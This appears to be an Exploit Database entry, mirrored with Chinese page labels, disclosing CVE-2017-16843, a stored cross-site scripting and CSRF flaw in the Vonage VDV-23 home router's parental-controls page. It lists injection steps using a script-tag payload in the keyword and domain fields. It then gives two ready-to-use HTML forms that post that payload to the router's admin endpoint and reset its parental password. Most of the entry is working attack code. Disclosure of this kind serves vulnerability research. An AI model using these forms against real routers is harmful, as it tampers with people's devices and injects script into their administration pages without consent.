Vonage VDV23 – Cross-Site Scripting

• Exploit Database
• 17 阅读

• 作者： Nu11By73
  日期： 2017-11-16
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/43150/

• # Exploit Title: Vonage Home Router – Stored Xss
  # Date: 16/11/2017
  # Exploit Author: Nu11By73
  # Hardware Version: VDV-23: 115
  # Software Version: 3.2.11-0.9.40
  # CVE : CVE-2017-16843
  
  
  
  NewKeyword Parameter:
  
  1. Login to the router
  2. Click advanced setup
  3. Click parental controls
  4. In the block these keywords text box enter: test”><script>alert(1)</script>
  5. Click the add keyword button to receive the pop up. 
  
  
  NewDomain Parameter:
  
  1. Login to the router
  2. Click advanced setup
  3. Click parental controls
  4. In the block these websites text box enter: test”><script>alert(1)</script>
  5. Click the add domain button to receive the pop up.
  
  Proof of concept code:
  
  NewDomain.html
  <!—Note: The x and y values will need to be changed accordingly
  <html>
  <p>Authenticated Stored CSRF/XSS - Vonage Modem</p>
  <form method="POST" action="http://192.168.15.1/goform/RgParentalBasic">
  <input type="hidden" name="RemoveContentRule" value="0" />
  <input type="hidden" name="AddContentRule" value="0" />
  <input type="hidden" name="ContentRules" value="0" />
  <input type="hidden" name="RuleSelect" value="0" / >
  <input type="hidden" name="NewKeyword" value="" / >
  <input type="hidden" name="KeywordAction" value="0" />
  <input type="hidden" name="NewDomain" value="test'><script>alert(1)</script>" />
  <input type="hidden" name="x" value="50" />
  <input type="hidden" name="y" value="15" />
  <input type="hidden" name="DomainAction" value="1" />
  <input type="hidden" name="AllowedDomainAction" value="0" />
  <input type="hidden" name="ParentalPassword" value="Broadcom" />
  <input type="hidden" name="ParentalPasswordReEnter" value="Broadcom" />
  <input type="hidden" name="AccessDuration" value="30" />
  <input type="submit" title="Exploit" />
  </form>
  </html>
  
  NewKeyword.html
  <!—Note: The x and y values will need to be changed accordingly
  <html>
  <p>Authenticated Stored CSRF/XSS - Vonage Modem</p>
  <form method="POST" action="http://192.168.15.1/goform/RgParentalBasic">
  <input type="hidden" name="RemoveContentRule" value="0" />
  <input type="hidden" name="AddContentRule" value="0" />
  <input type="hidden" name="ContentRules" value="0" />
  <input type="hidden" name="RuleSelect" value="0" / >
  <input type="hidden" name="NewKeyword" value="test'><script>alert(1)</script>" / >
  <input type="hidden" name="x" value="61" />
  <input type="hidden" name="y" value="12" />
  <input type="hidden" name="KeywordAction" value="1" />
  <input type="hidden" name="NewDomain" value="" />
  <input type="hidden" name="DomainAction" value="0" />
  <input type="hidden" name="AllowedDomainAction" value="0" />
  <input type="hidden" name="ParentalPassword" value="Broadcom" />
  <input type="hidden" name="ParentalPasswordReEnter" value="Broadcom" />
  <input type="hidden" name="AccessDuration" value="30" />
  <input type="submit" title="Enable Service" />
  </form>
  </html>